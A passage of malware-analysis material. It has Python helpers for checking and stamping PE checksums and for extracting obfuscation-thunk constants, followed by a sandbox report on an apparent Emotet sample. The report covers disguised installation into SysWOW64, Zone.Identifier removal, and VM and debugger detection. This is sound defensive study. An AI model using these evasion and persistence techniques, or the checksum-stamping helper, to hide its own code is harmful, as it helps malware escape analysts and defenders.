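    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature at e_lfanew")
    return e_lfanew + 4 + 20 + OPT_HDR_CHECKSUM   # signature + IMAGE_FILE_HEADER


def pe_checksum(image: bytes, checksum_field: int) -> int:
    """Image checksum as imagehlp computes it: 32-bit words summed with
    end-around carry, the CheckSum field itself skipped, folded to 16 bits,
    plus the unpadded file length."""
    padded = image + b"\0" * (-len(image) % 4)
    total = 0
    for index in range(len(padded) // 4):
        if index == checksum_field // 4:
            continue
        total += struct.unpack_from("<I", padded, index * 4)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(image)


def verify_checksum(image: bytes):
    """Return (stored, computed, matches). Stored == 0 means the linker never
    set one, which is normal for user-mode binaries; a non-zero stored value
    that does not match means the bytes changed after linking (packing,
    patching or a sloppy builder), as in the report's sample."""
    field = locate_checksum_field(image)
    stored = struct.unpack_from("<I", image, field)[0]
    computed = pe_checksum(image, field)
    return stored, computed, stored == computed


def stamp_checksum(image: bytes) -> bytes:
    """Write the correct value into the CheckSum field, as a linker would."""
    field = locate_checksum_field(image)
    fixed = struct.pack("<I", pe_checksum(image, field))
    return image[:field] + fixed + image[field + 4:]


def harvest_stub_constants(code: bytes, base: int = 0):
    """Find every `push ecx; mov dword ptr [esp], imm32` thunk in a code blob
    and return [(virtual address, imm32), ...] for feeding into a hash or
    index lookup script. `base` is the virtual address of code[0]."""
    found = []
    offset = code.find(STUB_PREFIX)
    while offset != -1 and offset + 8 <= len(code):
        imm = struct.unpack_from("<I", code, offset + 4)[0]
        found.append((base + offset, imm))
        offset = code.find(STUB_PREFIX, offset + 8)
    return found


def build_test_image(payload: bytes = b"") -> bytes:
    """Constructed, non-loadable PE32 stub: DOS header with e_lfanew=0x40, the
    PE signature, an i386 file header, a 0xE0-byte optional header whose
    CheckSum is 0, then an arbitrary payload. Enough to exercise the maths."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    file_header = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0xE0, 0x102)
    optional = struct.pack("<H", 0x10B).ljust(0xE0, b"\0")
    return dos + b"PE\0\0" + file_header + optional + payload


# Constructed code blob: three thunks using immediates quoted in the report,
# each followed by a ret and two nops as filler (real thunks are larger).
SAMPLE_CODE = b"".join(
    STUB_PREFIX + struct.pack("<I", imm) + b"\xc3\x90\x90"
    for imm in (0xEDA0, 0x7A5D, 0xC40A)
)

if __name__ == "__main__":
    image = build_test_image(b"constructed payload")
    print("fresh  :", verify_checksum(image))
    good = stamp_checksum(image)
    print("stamped:", verify_checksum(good))
    patched = good[:-1] + bytes([good[-1] ^ 0x01])
    print("patched:", verify_checksum(patched))
    for address, imm in harvest_stub_constants(SAMPLE_CODE, base=0x022A5E20):
        print(f"stub at {address:#010x} pushes {imm:#06x}")
```

To run this against a real file, read it with `open(path, "rb").read()` and pass the bytes to `verify_checksum`; for the stub scan, pass the bytes of the `.text` section or a dumped memory region together with its virtual address as `base`, since the report's 0x022Axxxx and 0x0213xxxx addresses are in-memory regions, not file offsets.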
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0041343A push ecx; ret 0_2_0041344D
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00412DD9 push ecx; ret 0_2_00412DEC
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5E20 push ecx; mov dword ptr [esp], 0000EDA0h 0_2_022A5E21
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5E50 push ecx; mov dword ptr [esp], 00007A5Dh 0_2_022A5E51
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5E80 push ecx; mov dword ptr [esp], 0000C40Ah 0_2_022A5E81
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5EE0 push ecx; mov dword ptr [esp], 00000AC6h 0_2_022A5EE1
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5F70 push ecx; mov dword ptr [esp], 0000E7B9h 0_2_022A5F71
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5F40 push ecx; mov dword ptr [esp], 0000E5DEh 0_2_022A5F41
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5FC0 push ecx; mov dword ptr [esp], 0000E566h 0_2_022A5FC1
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5D30 push ecx; mov dword ptr [esp], 000012E8h 0_2_022A5D31
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5D70 push ecx; mov dword ptr [esp], 00008FD2h 0_2_022A5D71
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5DA0 push ecx; mov dword ptr [esp], 00005C85h 0_2_022A5DA1
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5DD0 push ecx; mov dword ptr [esp], 0000F574h 0_2_022A5DD1
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02137A1E push ecx; mov dword ptr [esp], 0000C40Ah 0_2_02137A1F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02137A7E push ecx; mov dword ptr [esp], 00000AC6h 0_2_02137A7F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02137ADE push ecx; mov dword ptr [esp], 0000E5DEh 0_2_02137ADF
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02137B0E push ecx; mov dword ptr [esp], 0000E7B9h 0_2_02137B0F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02137B5E push ecx; mov dword ptr [esp], 0000E566h 0_2_02137B5F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_021378CE push ecx; mov dword ptr [esp], 000012E8h 0_2_021378CF
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213790E push ecx; mov dword ptr [esp], 00008FD2h 0_2_0213790F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213793E push ecx; mov dword ptr [esp], 00005C85h 0_2_0213793F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213796E push ecx; mov dword ptr [esp], 0000F574h 0_2_0213796F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_021379BE push ecx; mov dword ptr [esp], 0000EDA0h 0_2_021379BF
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_021379EE push ecx; mov dword ptr [esp], 00007A5Dh 0_2_021379EF
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_0041343A push ecx; ret 2_2_0041344D
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00412DD9 push ecx; ret 2_2_00412DEC
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B5E20 push ecx; mov dword ptr [esp], 0000EDA0h 2_2_023B5E21
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B5E50 push ecx; mov dword ptr [esp], 00007A5Dh 2_2_023B5E51
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B5E80 push ecx; mov dword ptr [esp], 0000C40Ah 2_2_023B5E81
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B5EE0 push ecx; mov dword ptr [esp], 00000AC6h 2_2_023B5EE1
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B5F70 push ecx; mov dword ptr [esp], 0000E7B9h 2_2_023B5F71

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Executable created and started: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe PE file moved: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe File opened: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe:Zone.Identifier read attributes | delete
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00403383 IsIconic,GetWindowPlacement,GetWindowRect, 0_2_00403383
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00403383 IsIconic,GetWindowPlacement,GetWindowRect, 2_2_00403383
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 6312 Thread sleep time: -210000s >= -30000s
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A38A0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose, 0_2_022A38A0
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B38A0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose, 2_2_023B38A0
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933904414.0000000002AA0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW8
Source: svchost.exe, 00000001.00000002.679765138.000001F66B660000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.724405286.0000013D946A0000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.739882896.00000237F9940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.772142896.0000028A68200000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933061753.00000000007E4000.00000004.00000020.sdmp, svchost.exe, 00000007.00000002.770987561.0000028A672E6000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000001.00000002.679765138.000001F66B660000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.724405286.0000013D946A0000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.739882896.00000237F9940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.772142896.0000028A68200000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000001.00000002.679765138.000001F66B660000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.724405286.0000013D946A0000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.739882896.00000237F9940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.772142896.0000028A68200000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000001.00000002.679765138.000001F66B660000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.724405286.0000013D946A0000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.739882896.00000237F9940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.772142896.0000028A68200000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00401D89 __EH_prolog3,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,CreateDirectoryA,VirtualAlloc,CreateDirectoryA, 0_2_00401D89
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00416C5D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00416C5D
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00401D89 __EH_prolog3,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,CreateDirectoryA,VirtualAlloc,CreateDirectoryA, 0_2_00401D89
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A3ED0 mov eax, dword ptr fs:[00000030h] 0_2_022A3ED0
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A4DF0 mov eax, dword ptr fs:[00000030h] 0_2_022A4DF0
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02135A6E mov eax, dword ptr fs:[00000030h] 0_2_02135A6E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213095E mov eax, dword ptr fs:[00000030h] 0_2_0213095E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213698E mov eax, dword ptr fs:[00000030h] 0_2_0213698E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02130456 mov eax, dword ptr fs:[00000030h] 0_2_02130456
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02231030 mov eax, dword ptr fs:[00000030h] 0_2_02231030
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B3ED0 mov eax, dword ptr fs:[00000030h] 2_2_023B3ED0
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B4DF0 mov eax, dword ptr fs:[00000030h] 2_2_023B4DF0
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022C5A6E mov eax, dword ptr fs:[00000030h] 2_2_022C5A6E
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022C095E mov eax, dword ptr fs:[00000030h] 2_2_022C095E
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022C698E mov eax, dword ptr fs:[00000030h] 2_2_022C698E
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022C0456 mov eax, dword ptr fs:[00000030h] 2_2_022C0456
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_02321030 mov eax, dword ptr fs:[00000030h] 2_2_02321030
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A3070 PathFindExtensionW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap, 0_2_022A3070
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_004159BE SetUnhandledExceptionFilter, 0_2_004159BE
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00416C5D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00416C5D
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00411CFF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00411CFF
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00417C9C SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00417C9C
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_004159BE SetUnhandledExceptionFilter, 2_2_004159BE
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00416C5D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00416C5D
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00411CFF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00411CFF
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00417C9C SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00417C9C
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933089387.0000000000E80000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933089387.0000000000E80000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933089387.0000000000E80000.00000002.00000001.sdmp Binary or memory string: Progman
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933089387.0000000000E80000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0041786B cpuid 0_2_0041786B
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA, 0_2_0041F472
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoA, 0_2_00425417
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoW, 0_2_0041F41E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetProcAddress,GetLocaleInfoW,LoadLibraryW, 0_2_0040D4E2
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoA, 0_2_00425774
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 0_2_004217F8
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA, 0_2_00422876
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoA, 0_2_00425880
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: __getptd,GetLocaleInfoA, 0_2_0042190F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoA,_strlen, 0_2_004219A7
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: __getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen, 0_2_00421A1B
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: __getptd,GetLocaleInfoA, 0_2_00421BED
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: _strlen,_strlen,EnumSystemLocalesA, 0_2_00421CAE
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: __getptd,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA, 0_2_00421D51
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: _strlen,EnumSystemLocalesA, 0_2_00421D15
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA, 2_2_0041F472
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: GetLocaleInfoA, 2_2_00425417
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: GetLocaleInfoW, 2_2_0041F41E
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: GetProcAddress,GetLocaleInfoW,LoadLibraryW, 2_2_0040D4E2
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: GetLocaleInfoA, 2_2_00425774
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 2_2_004217F8
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA, 2_2_00422876
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: GetLocaleInfoA, 2_2_00425880
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: __getptd,GetLocaleInfoA, 2_2_0042190F
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: GetLocaleInfoA,_strlen, 2_2_004219A7
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: __getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen, 2_2_00421A1B
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: __getptd,GetLocaleInfoA, 2_2_00421BED
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: _strlen,_strlen,EnumSystemLocalesA, 2_2_00421CAE
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: __getptd,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA, 2_2_00421D51
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: _strlen,EnumSystemLocalesA, 2_2_00421D15
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_004168FD GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_004168FD
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_004031CE GetVersionExA, 0_2_004031CE
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 00000000.00000002.684687959.0000000002234000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.933157182.00000000022C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.933217408.0000000002324000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.684411365.0000000002130000.00000040.00000001.sdmp, type: MEMORY